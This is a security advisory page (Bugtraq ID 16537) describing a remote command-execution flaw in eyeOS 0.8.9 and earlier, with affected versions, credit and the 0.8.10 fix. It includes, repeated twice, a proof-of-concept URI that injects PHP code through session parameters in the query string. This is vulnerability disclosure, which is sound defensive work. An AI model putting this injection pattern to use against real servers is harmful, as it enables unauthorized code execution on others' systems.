EyeOS Session Remote Command Execution Vulnerability
BID:16537
Info
EyeOS Session Remote Command Execution Vulnerability
| Bugtraq ID: | 16537 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 07 2006 12:00AM |
| Updated: | Feb 07 2006 12:00AM |
| Credit: | James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability. |
| Vulnerable: |
eyeOS eyeOS 0.8.9 eyeOS eyeOS 0.8.5 eyeOS eyeOS 0.8.4 -r1 eyeOS eyeOS 0.8.4 eyeOS eyeOS 0.8.3 -r2 eyeOS eyeOS 0.8.3 |
| Not Vulnerable: |
eyeOS eyeOS 0.8.10 |
Discussion
EyeOS Session Remote Command Execution Vulnerability
The eyeOS system is prone to a remote command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary commands in the context of the webserver process.
This issue affects eyeOS version 0.8.9 and earlier.
The eyeOS system is prone to a remote command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary commands in the context of the webserver process.
This issue affects eyeOS version 0.8.9 and earlier.
Exploit / POC
EyeOS Session Remote Command Execution Vulnerability
An exploit is not required.
The following proof of concept URI is available:
http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();
An exploit is not required.
The following proof of concept URI is available:
http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();
Solution / Fix
EyeOS Session Remote Command Execution Vulnerability
Solution:
The vendor has released version 0.8.10 to address this issue.
eyeOS eyeOS 0.8.3
eyeOS eyeOS 0.8.3 -r2
eyeOS eyeOS 0.8.4 -r1
eyeOS eyeOS 0.8.4
eyeOS eyeOS 0.8.5
eyeOS eyeOS 0.8.9
Solution:
The vendor has released version 0.8.10 to address this issue.
eyeOS eyeOS 0.8.3
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
eyeOS eyeOS 0.8.3 -r2
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
eyeOS eyeOS 0.8.4 -r1
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
eyeOS eyeOS 0.8.4
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
eyeOS eyeOS 0.8.5
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
eyeOS eyeOS 0.8.9
-
eyeOS eyeOS-0.8.10.tar.gz
http://prdownloads.sourceforge.net/eyeos/eyeOS-0.8.10.tar.gz
References
EyeOS Session Remote Command Execution Vulnerability
References:
References:
- eyeOS Homepage (eyeOS)
- eyeOS Remote Code Execution (GulfTech)
- New eyeOS 0.8.10: Welcome, themes! (eyeOS)